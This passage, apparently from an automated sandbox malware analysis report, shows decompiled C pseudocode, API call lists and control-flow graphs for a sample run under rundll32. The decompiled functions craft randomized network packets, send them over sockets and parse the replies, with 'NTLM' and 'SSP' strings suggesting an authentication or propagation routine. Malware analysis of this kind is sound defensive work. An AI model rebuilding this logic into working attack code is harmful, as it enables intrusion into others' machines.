                                                                                                          				goto L49;
                                                                                                          			}









































































                                                                                                          0x04a4174d
                                                                                                          0x04a41753
                                                                                                          0x04a41757
                                                                                                          0x04a4175a
                                                                                                          0x04a4175a
                                                                                                          0x04a4175d
                                                                                                          0x04a41760
                                                                                                          0x04a4176f
                                                                                                          0x04a41772
                                                                                                          0x04a41778
                                                                                                          0x04a4177a
                                                                                                          0x04a4178e
                                                                                                          0x04a41790
                                                                                                          0x04a41795
                                                                                                          0x04a41c30
                                                                                                          0x04a41c37
                                                                                                          0x04a41c37
                                                                                                          0x04a4179b
                                                                                                          0x04a417a0
                                                                                                          0x04a417a2
                                                                                                          0x04a417a2
                                                                                                          0x04a417a5
                                                                                                          0x04a417a9
                                                                                                          0x04a417ac
                                                                                                          0x04a417b2
                                                                                                          0x04a417b8
                                                                                                          0x04a417bb
                                                                                                          0x04a417be
                                                                                                          0x04a417be
                                                                                                          0x04a417c1
                                                                                                          0x04a417c4
                                                                                                          0x04a417d7
                                                                                                          0x04a417df
                                                                                                          0x04a417e1
                                                                                                          0x04a417e6
                                                                                                          0x04a41c22
                                                                                                          0x04a41c2a
                                                                                                          0x00000000
                                                                                                          0x04a41c2a
                                                                                                          0x04a417ef
                                                                                                          0x04a417f3
                                                                                                          0x04a417f6
                                                                                                          0x04a417ff
                                                                                                          0x04a417ff
                                                                                                          0x04a41801
                                                                                                          0x04a41807
                                                                                                          0x04a4180a
                                                                                                          0x04a41815
                                                                                                          0x04a41819
                                                                                                          0x04a4181a
                                                                                                          0x04a41823
                                                                                                          0x04a41824
                                                                                                          0x04a4182a
                                                                                                          0x04a41830
                                                                                                          0x04a41831
                                                                                                          0x04a41835
                                                                                                          0x04a41839
                                                                                                          0x04a4183f
                                                                                                          0x04a41846
                                                                                                          0x04a4184b
                                                                                                          0x04a4184e
                                                                                                          0x04a41850
                                                                                                          0x04a41852
                                                                                                          0x04a41853
                                                                                                          0x04a41855
                                                                                                          0x04a41856
                                                                                                          0x04a41856
                                                                                                          0x04a41863
                                                                                                          0x04a4186b
                                                                                                          0x04a41c16
                                                                                                          0x04a41c1c
                                                                                                          0x00000000
                                                                                                          0x04a41c1c
                                                                                                          0x04a41871
                                                                                                          0x04a4187f
                                                                                                          0x04a4188a
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a4189c
                                                                                                          0x04a418a5
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a418ad
                                                                                                          0x04a418ae
                                                                                                          0x04a418b5
                                                                                                          0x04a418c1
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a418ce
                                                                                                          0x04a418d2
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a418d4
                                                                                                          0x04a418dd
                                                                                                          0x04a418e8
                                                                                                          0x04a418f2
                                                                                                          0x04a418fd
                                                                                                          0x04a418ff
                                                                                                          0x04a41904
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a4191f
                                                                                                          0x04a41926
                                                                                                          0x04a41c08
                                                                                                          0x04a41c10
                                                                                                          0x00000000
                                                                                                          0x04a41c10
                                                                                                          0x04a4192c
                                                                                                          0x04a41941
                                                                                                          0x04a41948
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a41955
                                                                                                          0x04a4195b
                                                                                                          0x04a4195d
                                                                                                          0x04a41962
                                                                                                          0x04a41bfa
                                                                                                          0x04a41c02
                                                                                                          0x00000000
                                                                                                          0x04a41c02
                                                                                                          0x04a4196b
                                                                                                          0x04a41970
                                                                                                          0x04a41973
                                                                                                          0x04a41976
                                                                                                          0x04a41979
                                                                                                          0x04a4197c
                                                                                                          0x04a41983
                                                                                                          0x04a41983
                                                                                                          0x04a4198c
                                                                                                          0x04a4198f
                                                                                                          0x04a4198f
                                                                                                          0x04a41992
                                                                                                          0x04a41992
                                                                                                          0x04a419a7
                                                                                                          0x04a419ae
                                                                                                          0x04a419bb
                                                                                                          0x04a419bd
                                                                                                          0x04a419c2
                                                                                                          0x04a419cb
                                                                                                          0x04a419d0
                                                                                                          0x04a419d1
                                                                                                          0x04a419d2
                                                                                                          0x04a419d3
                                                                                                          0x04a419d6
                                                                                                          0x04a419dc
                                                                                                          0x04a419e5
                                                                                                          0x04a419e7
                                                                                                          0x04a419ed
                                                                                                          0x04a419ed
                                                                                                          0x04a419ff
                                                                                                          0x04a41a08
                                                                                                          0x04a41a0a
                                                                                                          0x04a41a0a
                                                                                                          0x04a41a1c
                                                                                                          0x04a41a20
                                                                                                          0x04a41a30
                                                                                                          0x04a41a37
                                                                                                          0x04a41a37
                                                                                                          0x04a41a39
                                                                                                          0x04a41a3f
                                                                                                          0x04a41a42
                                                                                                          0x04a41a4b
                                                                                                          0x04a41a51
                                                                                                          0x04a41a52
                                                                                                          0x04a41a59
                                                                                                          0x04a41a5f
                                                                                                          0x04a41a63
                                                                                                          0x04a41a67
                                                                                                          0x04a41a6d
                                                                                                          0x04a41a74
                                                                                                          0x04a41a79
                                                                                                          0x04a41a79
                                                                                                          0x04a41a85
                                                                                                          0x04a41a8c
                                                                                                          0x04a41a8e
                                                                                                          0x04a41a91
                                                                                                          0x04a41a93
                                                                                                          0x04a41a96
                                                                                                          0x04a41a98
                                                                                                          0x04a41a9d
                                                                                                          0x04a41aa2
                                                                                                          0x04a41aa9
                                                                                                          0x04a41aad
                                                                                                          0x04a41ab1
                                                                                                          0x04a41ab5
                                                                                                          0x04a41ab9
                                                                                                          0x04a41ac0
                                                                                                          0x04a41ac7
                                                                                                          0x04a41ad1
                                                                                                          0x04a41b10
                                                                                                          0x04a41b11
                                                                                                          0x04a41b16
                                                                                                          0x04a41b19
                                                                                                          0x04a41b1c
                                                                                                          0x04a41b1f
                                                                                                          0x04a41b20
                                                                                                          0x04a41b23
                                                                                                          0x04a41b26
                                                                                                          0x04a41b29
                                                                                                          0x04a41b2d
                                                                                                          0x04a41ad3
                                                                                                          0x04a41ad5
                                                                                                          0x04a41ad6
                                                                                                          0x04a41ada
                                                                                                          0x04a41ae3
                                                                                                          0x04a41aea
                                                                                                          0x04a41aed
                                                                                                          0x04a41aee
                                                                                                          0x04a41af1
                                                                                                          0x04a41af4
                                                                                                          0x04a41af7
                                                                                                          0x04a41afb
                                                                                                          0x04a41aff
                                                                                                          0x04a41b02
                                                                                                          0x04a41b09
                                                                                                          0x04a41b09
                                                                                                          0x04a41b34
                                                                                                          0x04a41b34
                                                                                                          0x04a41b3d
                                                                                                          0x04a41b48
                                                                                                          0x04a41b4f
                                                                                                          0x04a41b55
                                                                                                          0x04a41b6e
                                                                                                          0x04a41b6f
                                                                                                          0x04a41b6f
                                                                                                          0x04a41b57
                                                                                                          0x04a41b57
                                                                                                          0x04a41b5c
                                                                                                          0x04a41b5e
                                                                                                          0x04a41b61
                                                                                                          0x04a41b61
                                                                                                          0x04a41b7a
                                                                                                          0x04a41b82
                                                                                                          0x04a41b84
                                                                                                          0x04a41b93
                                                                                                          0x04a41b9b
                                                                                                          0x04a41ba1
                                                                                                          0x04a41ba3
                                                                                                          0x04a41ba3
                                                                                                          0x04a41bab
                                                                                                          0x04a41bb0
                                                                                                          0x04a41b9b
                                                                                                          0x04a41bbd
                                                                                                          0x04a41bbd
                                                                                                          0x04a41bcf
                                                                                                          0x04a41bdb
                                                                                                          0x04a41bdb
                                                                                                          0x04a41be6
                                                                                                          0x04a41be6
                                                                                                          0x04a41bf4
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,00000000,?,00000000,04A41C7A,00000000,?,00000000,00000000,?,?,00000003,00000000,?,00000000), ref: 04A41783
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A4178C
                                                                                                          • CharUpperW.USER32(00000000), ref: 04A417B2
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000086), ref: 04A417DA
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A417DD
                                                                                                          • htons.WS2_32(00000082), ref: 04A41801
                                                                                                          • send.WS2_32(00000086,?,00000086,00000041), ref: 04A41863
                                                                                                          • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04A4187F
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000018), ref: 04A418F4
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A418FD
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000010,?,00000000,?,00008003,00008003,?,?,00000000,?,00008002), ref: 04A41958
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A4195B
                                                                                                          • rand.MSVCRT ref: 04A41983
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000018,?,00000010,?,?,00008003), ref: 04A419B8
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A419BB
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04A41A13
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A41A16
                                                                                                          • htons.WS2_32(-000000FC), ref: 04A41A39
                                                                                                          • memcpy.MSVCRT ref: 04A41B48
                                                                                                          • send.WS2_32(?,00000000,00000000,00000000), ref: 04A41B7A
                                                                                                          • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04A41B93
                                                                                                          • memset.MSVCRT ref: 04A41BAB
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04A41BB6
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A41BBD
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04A41BC8
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A41BCF
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 04A41BE3
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A41BE6
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000010,?,?,00008003), ref: 04A41BF1
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A41BF4
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 04A41BFF
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A41C02
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,00008002), ref: 04A41C0D
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A41C10
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 04A41C19
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A41C1C
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 04A41C27
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A41C2A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$Free$Alloc$htonsrecvsend$CharUppermemcpymemsetrand
                                                                                                          • String ID: Oqt Uqt0Xqt$NTLM$SSP
                                                                                                          • API String ID: 2370844593-2294173186
                                                                                                          • Opcode ID: 2c5e5a7a89ae0ec6888327fd95d8bba3f069c32a5ee5c28ec1a45b75696a5882
                                                                                                          • Instruction ID: c725b757afeed9d02dff37805887b3f3bde97969969de70feddb49cfecf92fa4
                                                                                                          • Opcode Fuzzy Hash: 2c5e5a7a89ae0ec6888327fd95d8bba3f069c32a5ee5c28ec1a45b75696a5882
                                                                                                          • Instruction Fuzzy Hash: 00F1AD75A00306AFEB14DFA8C889BAE7BB4FFD8300F048459E945DB291E775E845CB54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 112 4a42497-4a424bf GetProcessHeap HeapAlloc 113 4a424c5-4a424d6 GetProcessHeap HeapAlloc 112->113 114 4a426ff-4a42705 112->114 115 4a426ec-4a426fe 113->115 116 4a424dc-4a4255d rand htons 113->116 115->114 117 4a4256f-4a4258a HeapAlloc 116->117 118 4a4255f-4a4256d rand 116->118 121 4a42590-4a425cb htons 117->121 122 4a426dc-4a426e5 117->122 118->117 118->118 124 4a425cd-4a425db rand 121->124 122->115 124->124 126 4a425dd-4a425f8 HeapAlloc 124->126 128 4a426cc-4a426d5 126->128 129 4a425fe-4a42634 memcpy * 2 send 126->129 128->122 130 4a426ba-4a426c5 129->130 131 4a4263a-4a42651 send 129->131 130->128 131->130 132 4a42653-4a42667 131->132 135 4a42694-4a4269b recv 132->135 136 4a4269d 135->136 137 4a42669-4a42677 135->137 136->130 137->130 138 4a42679-4a42680 137->138 138->130 139 4a42682-4a42688 138->139 140 4a4269f-4a426a3 139->140 141 4a4268a-4a42693 139->141 142 4a426a5-4a426b4 call 4a42344 140->142 143 4a426b6 140->143 141->135 142->130 143->130
                                                                                                          C-Code - Quality: 68%
                                                                                                          			E04A42497(void* __ecx, intOrPtr _a4, void** _a8, signed int _a12, intOrPtr _a16) {
                                                                                                          				char _v5;
                                                                                                          				void* _v12;
                                                                                                          				void* __esi;
                                                                                                          				void* _t65;
                                                                                                          				signed int _t71;
                                                                                                          				void* _t73;
                                                                                                          				short _t75;
                                                                                                          				void* _t84;
                                                                                                          				void* _t95;
                                                                                                          				void* _t100;
                                                                                                          				void* _t101;
                                                                                                          				void* _t105;
                                                                                                          				signed int _t108;
                                                                                                          				signed int _t109;
                                                                                                          				intOrPtr _t111;
                                                                                                          				signed int _t112;
                                                                                                          				signed int _t115;
                                                                                                          				void* _t120;
                                                                                                          				void** _t124;
                                                                                                          				void* _t128;
                                                                                                          				void* _t131;
                                                                                                          				void* _t137;
                                                                                                          				void* _t139;
                                                                                                          				void* _t140;
                                                                                                          				intOrPtr* _t141;
                                                                                                          				intOrPtr* _t142;
                                                                                                          
                                                                                                          				_push(__ecx);
                                                                                                          				_push(__ecx);
                                                                                                          				_v5 = 0;
                                                                                                          				_t65 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                          				_v12 = _t65;
                                                                                                          				if(_t65 == 0) {
                                                                                                          					L24:
                                                                                                          					return _v5;
                                                                                                          				}
                                                                                                          				_t105 = HeapAlloc(GetProcessHeap(), 8, 0x1124);
                                                                                                          				if(_t105 == 0) {
                                                                                                          					L23:
                                                                                                          					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                          					goto L24;
                                                                                                          				}
                                                                                                          				_t124 = _a8;
                                                                                                          				_t71 = rand();
                                                                                                          				_t108 = 0x14;
                                                                                                          				asm("cdq");
                                                                                                          				_t109 = 9;
                                                                                                          				 *((intOrPtr*)( *_t124 + 0x22)) =  *((intOrPtr*)( *_t124 + 0x22)) + _t71 % _t108;
                                                                                                          				_t73 = memcpy(_t105,  *_t124, _t109 << 2);
                                                                                                          				__imp__#9(0x1120);
                                                                                                          				 *(_t105 + 2) = _t73;
                                                                                                          				_t111 = 4;
                                                                                                          				 *((intOrPtr*)(_t105 + 0x40)) = 0x10d0;
                                                                                                          				 *((intOrPtr*)(_t105 + 0x2c)) = 0x10d0;
                                                                                                          				 *((intOrPtr*)(_t105 + 0x34)) = 0x10d0;
                                                                                                          				_t75 = 5;
                                                                                                          				 *((short*)(_t105 + 0x49)) = _t75;
                                                                                                          				 *((short*)(_t105 + 0x4b)) =  *((intOrPtr*)(_t105 + 0x40)) + 7;
                                                                                                          				 *((char*)(_t105 + 8)) = 0xa0;
                                                                                                          				 *((char*)(_t105 + 0x24)) = 0x13;
                                                                                                          				 *((intOrPtr*)(_t105 + 0x28)) = 0;
                                                                                                          				 *((intOrPtr*)(_t105 + 0x30)) = 0x3f3c;
                                                                                                          				 *((intOrPtr*)(_t105 + 0x38)) = _t111;
                                                                                                          				 *((intOrPtr*)(_t105 + 0x3c)) = 0x4c;
                                                                                                          				 *((intOrPtr*)(_t105 + 0x44)) = 0x50;
                                                                                                          				_t137 = 0;
                                                                                                          				 *((short*)(_t105 + 0x50)) = _a12;
                                                                                                          				if( *((intOrPtr*)(_t105 + 0x40)) <= 0) {
                                                                                                          					L4:
                                                                                                          					_t128 = HeapAlloc(GetProcessHeap(), 8, 0x160);
                                                                                                          					_a12 = _t128;
                                                                                                          					if(_t128 == 0) {
                                                                                                          						L22:
                                                                                                          						HeapFree(GetProcessHeap(), 8, _t105);
                                                                                                          						goto L23;
                                                                                                          					}
                                                                                                          					_t112 = 9;
                                                                                                          					_t84 = memcpy(_t128,  *_a8, _t112 << 2);
                                                                                                          					__imp__#9(0x15c);
                                                                                                          					_t131 = _a12;
                                                                                                          					 *(_t131 + 2) = _t84;
                                                                                                          					 *((intOrPtr*)(_t131 + 0x2c)) = 0x114;
                                                                                                          					 *((intOrPtr*)(_t131 + 0x3c)) = 0x114;
                                                                                                          					 *((char*)(_t131 + 8)) = 0xa1;
                                                                                                          					 *((char*)(_t131 + 0x24)) = 0x12;
                                                                                                          					 *((intOrPtr*)(_t131 + 0x40)) = 0x48;
                                                                                                          					 *((short*)(_t131 + 0x49)) = 0x115;
                                                                                                          					_t139 = 0;
                                                                                                          					do {
                                                                                                          						 *((char*)(_t131 + _t139 + 0x4c)) = rand();
                                                                                                          						_t139 = _t139 + 1;
                                                                                                          					} while (_t139 <  *((intOrPtr*)(_t131 + 0x3c)));
                                                                                                          					_t140 = HeapAlloc(GetProcessHeap(), 8, 0x1284);
                                                                                                          					_a8 = _t140;
                                                                                                          					if(_t140 == 0) {
                                                                                                          						L21:
                                                                                                          						HeapFree(GetProcessHeap(), 8, _t131);
                                                                                                          						goto L22;
                                                                                                          					}
                                                                                                          					memcpy(_t140, _t105, 0x1124);
                                                                                                          					_t46 = _t140 + 0x1124; // 0x1124
                                                                                                          					memcpy(_t46, _t131, 0x160);
                                                                                                          					_t141 = __imp__#19; // executed
                                                                                                          					_t95 =  *_t141(_a4, _t140, 0x111c, 0); // executed
                                                                                                          					if(_t95 <= 0) {
                                                                                                          						L20:
                                                                                                          						HeapFree(GetProcessHeap(), 8, _a8);
                                                                                                          						goto L21;
                                                                                                          					}
                                                                                                          					_t100 =  *_t141(_a4, _a8 + 0x111c, 0x168, 0); // executed
                                                                                                          					if(_t100 <= 0) {
                                                                                                          						goto L20;
                                                                                                          					}
                                                                                                          					_a12 = _a12 & 0x00000000;
                                                                                                          					_t142 = __imp__#16;
                                                                                                          					_push(0);
                                                                                                          					_push(0xffff);
                                                                                                          					_push(_v12);
                                                                                                          					while(1) {
                                                                                                          						_t101 =  *_t142(_a4); // executed
                                                                                                          						if(_t101 <= 0) {
                                                                                                          							break;
                                                                                                          						}
                                                                                                          						_t115 = _a12 + _t101;
                                                                                                          						_a12 = _t115;
                                                                                                          						if(_t115 == 0x1193) {
                                                                                                          							goto L20;
                                                                                                          						}
                                                                                                          						_t120 = _v12;
                                                                                                          						if( *((intOrPtr*)(_t120 + 9)) != 0) {
                                                                                                          							goto L20;
                                                                                                          						}
                                                                                                          						if(_t115 >= 0x1280) {
                                                                                                          							if(_t101 < 0x1c) {
                                                                                                          								_v5 = 0;
                                                                                                          							} else {
                                                                                                          								_v5 = E04A42344(_t101, _t115 - _t101 + _t120, _a16);
                                                                                                          							}
                                                                                                          							goto L20;
                                                                                                          						}
                                                                                                          						_push(0);
                                                                                                          						_push(0xffff);
                                                                                                          						_push(_t120 + _t115);
                                                                                                          					}
                                                                                                          					goto L20;
                                                                                                          				} else {
                                                                                                          					goto L3;
                                                                                                          				}
                                                                                                          				do {
                                                                                                          					L3:
                                                                                                          					 *((char*)(_t105 + _t137 + 0x54)) = rand();
                                                                                                          					_t137 = _t137 + 1;
                                                                                                          				} while (_t137 <  *((intOrPtr*)(_t105 + 0x40)));
                                                                                                          				goto L4;
                                                                                                          			}





























                                                                                                          0x04a4249a
                                                                                                          0x04a4249b
                                                                                                          0x04a424ab
                                                                                                          0x04a424b8
                                                                                                          0x04a424ba
                                                                                                          0x04a424bf
                                                                                                          0x04a426ff
                                                                                                          0x04a42705
                                                                                                          0x04a42705
                                                                                                          0x04a424d2
                                                                                                          0x04a424d6
                                                                                                          0x04a426ec
                                                                                                          0x04a426f8
                                                                                                          0x00000000
                                                                                                          0x04a426fe
                                                                                                          0x04a424dc
                                                                                                          0x04a424e1
                                                                                                          0x04a424e9
                                                                                                          0x04a424ea
                                                                                                          0x04a424ef
                                                                                                          0x04a424f5
                                                                                                          0x04a424fd
                                                                                                          0x04a424ff
                                                                                                          0x04a42505
                                                                                                          0x04a4250b
                                                                                                          0x04a42511
                                                                                                          0x04a42514
                                                                                                          0x04a42517
                                                                                                          0x04a4251c
                                                                                                          0x04a4251d
                                                                                                          0x04a42529
                                                                                                          0x04a42531
                                                                                                          0x04a42535
                                                                                                          0x04a42539
                                                                                                          0x04a4253c
                                                                                                          0x04a42543
                                                                                                          0x04a42546
                                                                                                          0x04a4254d
                                                                                                          0x04a42554
                                                                                                          0x04a42556
                                                                                                          0x04a4255d
                                                                                                          0x04a4256f
                                                                                                          0x04a42583
                                                                                                          0x04a42585
                                                                                                          0x04a4258a
                                                                                                          0x04a426dc
                                                                                                          0x04a426e6
                                                                                                          0x00000000
                                                                                                          0x04a426e6
                                                                                                          0x04a42597
                                                                                                          0x04a4259d
                                                                                                          0x04a4259f
                                                                                                          0x04a425a5
                                                                                                          0x04a425a8
                                                                                                          0x04a425b1
                                                                                                          0x04a425b4
                                                                                                          0x04a425b8
                                                                                                          0x04a425bc
                                                                                                          0x04a425c0
                                                                                                          0x04a425c7
                                                                                                          0x04a425cb
                                                                                                          0x04a425cd
                                                                                                          0x04a425d3
                                                                                                          0x04a425d7
                                                                                                          0x04a425d8
                                                                                                          0x04a425f1
                                                                                                          0x04a425f3
                                                                                                          0x04a425f8
                                                                                                          0x04a426cc
                                                                                                          0x04a426d6
                                                                                                          0x00000000
                                                                                                          0x04a426d6
                                                                                                          0x04a42605
                                                                                                          0x04a4260f
                                                                                                          0x04a42617
                                                                                                          0x04a4262a
                                                                                                          0x04a42630
                                                                                                          0x04a42634
                                                                                                          0x04a426ba
                                                                                                          0x04a426c6
                                                                                                          0x00000000
                                                                                                          0x04a426c6
                                                                                                          0x04a4264d
                                                                                                          0x04a42651
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a42653
                                                                                                          0x04a42657
                                                                                                          0x04a4265d
                                                                                                          0x04a4265f
                                                                                                          0x04a42664
                                                                                                          0x04a42694
                                                                                                          0x04a42697
                                                                                                          0x04a4269b
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a4266c
                                                                                                          0x04a4266e
                                                                                                          0x04a42677
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a42679
                                                                                                          0x04a42680
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a42688
                                                                                                          0x04a426a3
                                                                                                          0x04a426b6
                                                                                                          0x04a426a5
                                                                                                          0x04a426b1
                                                                                                          0x04a426b1
                                                                                                          0x00000000
                                                                                                          0x04a426a3
                                                                                                          0x04a4268a
                                                                                                          0x04a4268c
                                                                                                          0x04a42693
                                                                                                          0x04a42693
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a4255f
                                                                                                          0x04a4255f
                                                                                                          0x04a42565
                                                                                                          0x04a42569
                                                                                                          0x04a4256a
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,04A4471C,?,?,?,?,?), ref: 04A424AF
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,04A4471C,?,?,?,?,?), ref: 04A424B8
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00001124,74714F20,?,?,?,04A4471C,?,?,?,?,?), ref: 04A424CD
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,04A4471C,?,?,?,?,?), ref: 04A424D0
                                                                                                          • rand.MSVCRT ref: 04A424E1
                                                                                                          • htons.WS2_32(00001120), ref: 04A424FF
                                                                                                          • rand.MSVCRT ref: 04A4255F
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000160,?,?,?,04A4471C,?,?,?,?,?), ref: 04A42576
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,04A4471C,?,?,?,?,?), ref: 04A4257D
                                                                                                          • htons.WS2_32(0000015C), ref: 04A4259F
                                                                                                          • rand.MSVCRT ref: 04A425CD
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00001284,?,?,?,04A4471C,?,?,?,?,?), ref: 04A425E4
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,04A4471C,?,?,?,?,?), ref: 04A425EB
                                                                                                          • memcpy.MSVCRT ref: 04A42605
                                                                                                          • memcpy.MSVCRT ref: 04A42617
                                                                                                          • send.WS2_32(?,00000000,0000111C,00000000), ref: 04A42630
                                                                                                          • send.WS2_32(?,?,00000168,00000000), ref: 04A4264D
                                                                                                          • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04A42697
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,04A4471C,?,?,?,?,?), ref: 04A426BF
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,04A4471C,?,?,?,?,?), ref: 04A426C6
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,?,?,04A4471C,?,?,?,?,?), ref: 04A426CF
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,04A4471C,?,?,?,?,?), ref: 04A426D6
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04A4471C,?,?,?,?,?), ref: 04A426DF
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,04A4471C,?,?,?,?,?), ref: 04A426E6
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,?,?,04A4471C,?,?,?,?,?), ref: 04A426F1
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,04A4471C,?,?,?,?,?), ref: 04A426F8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$AllocFree$rand$htonsmemcpysend$recv
                                                                                                          • String ID: Oqt Uqt0Xqt
                                                                                                          • API String ID: 3700823678-636472023
                                                                                                          • Opcode ID: 8f60f9a4e3282a9c9d09668740da1710bbde7488e33dd55390bc67319e55e585
                                                                                                          • Instruction ID: fa032bb5154d061d2780792d17a78cc2f181fb5962b49a0515209d04eb8b9292
                                                                                                          • Opcode Fuzzy Hash: 8f60f9a4e3282a9c9d09668740da1710bbde7488e33dd55390bc67319e55e585
                                                                                                          • Instruction Fuzzy Hash: CB71DF76A00346EBEB509FA4CC49B9E7B64FFD8740F044099FA049B685D7B9E801CBA4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 185 4a421dc-4a42205 GetProcessHeap HeapAlloc 186 4a4233b-4a42341 185->186 187 4a4220b-4a4221c GetProcessHeap HeapAlloc 185->187 188 4a42222-4a4225d htons send 187->188 189 4a4232c-4a4233a GetProcessHeap 187->189 190 4a42320-4a42325 GetProcessHeap 188->190 191 4a42263-4a42279 recv 188->191 189->186 190->189 191->190 193 4a4227f-4a42286 191->193 193->190 194 4a4228c-4a422b1 memset GetProcessHeap HeapAlloc 193->194 194->190 195 4a422b3-4a422e2 htons send 194->195 196 4a422e4-4a422fa recv 195->196 197 4a42311-4a4231d GetProcessHeap 195->197 196->197 198 4a422fc-4a42300 196->198 197->190 198->197 199 4a42302-4a4230d 198->199 199->197
                                                                                                          C-Code - Quality: 64%
                                                                                                          			E04A421DC(intOrPtr _a4, void** _a8, void* _a12) {
                                                                                                          				char _v5;
                                                                                                          				void* _v12;
                                                                                                          				void* _v16;
                                                                                                          				void* _t35;
                                                                                                          				void* _t42;
                                                                                                          				short _t44;
                                                                                                          				void* _t47;
                                                                                                          				void* _t50;
                                                                                                          				void* _t51;
                                                                                                          				signed int _t57;
                                                                                                          				signed int _t60;
                                                                                                          				void* _t66;
                                                                                                          				void* _t74;
                                                                                                          				void* _t77;
                                                                                                          				void* _t79;
                                                                                                          
                                                                                                          				_v5 = 0;
                                                                                                          				_t35 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                          				_v12 = _t35;
                                                                                                          				if(_t35 == 0) {
                                                                                                          					L13:
                                                                                                          					return _v5;
                                                                                                          				}
